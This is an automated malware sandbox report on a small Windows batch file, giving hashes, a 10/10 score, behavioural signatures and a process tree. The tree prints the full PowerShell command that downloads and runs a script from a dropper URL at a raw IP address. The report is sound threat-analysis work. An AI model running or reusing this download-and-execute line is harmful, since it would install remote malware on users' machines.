Analysis
-
max time kernel
122s -
max time network
117s -
platform
windows10_x64 -
resource
win10 -
submitted
26-07-2020 15:10
Static task
static1
Behavioral task
behavioral1
Sample
4eb6ba5ba6c21ac7744e462c7de7df9a.bat
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
4eb6ba5ba6c21ac7744e462c7de7df9a.bat
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
4eb6ba5ba6c21ac7744e462c7de7df9a.bat
-
Size
213B
-
MD5
c706ae9c80ccdfa7c936b7c8df7cfa76
-
SHA1
5ec96eaf49a1004e20f9be597ef6c78b7bf69e55
-
SHA256
b3a094f34f9fb134e07a2e0b414bcbf01c2097dd4b14f98127ecdeb46343d4cc
-
SHA512
6299207c06345ea343eadff3fb433da135526d9410b863388597cf41c8fb91313a78509c7c69aae221f083a90cc6347a1d31642bbdfc3ac7c8dc5a5188d01ff6
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/4eb6ba5ba6c21ac7744e462c7de7df9a
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 344 wrote to memory of 3864 344 cmd.exe powershell.exe PID 344 wrote to memory of 3864 344 cmd.exe powershell.exe PID 344 wrote to memory of 3864 344 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3824 3864 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3824 WerFault.exe Token: SeBackupPrivilege 3824 WerFault.exe Token: SeDebugPrivilege 3824 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe 3824 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4eb6ba5ba6c21ac7744e462c7de7df9a.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4eb6ba5ba6c21ac7744e462c7de7df9a');Invoke-BUSJHY;Start-Sleep -s 10000"2⤵PID:3864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 7003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3824